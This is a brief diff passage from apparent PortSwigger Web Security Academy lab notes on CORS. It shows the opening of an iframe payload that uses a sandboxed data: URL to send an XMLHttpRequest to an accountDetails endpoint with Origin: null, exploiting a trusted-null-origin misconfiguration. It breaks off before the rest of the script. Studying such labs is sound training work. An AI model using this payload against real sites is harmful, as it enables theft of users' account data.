bergeramit/PortSwiggerWebSecurityAcademy/Client/3 - CORS.md

 }
 ```

-:Using the Iframe technique to execute the call to accountDetails with an Origin: null in order to get the relaxation for SOP:
+Using the Iframe technique to execute the call to accountDetails with an Origin: null in order to get the relaxation for SOP:
 ```html
 <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
 var req = new XMLHttpRequest();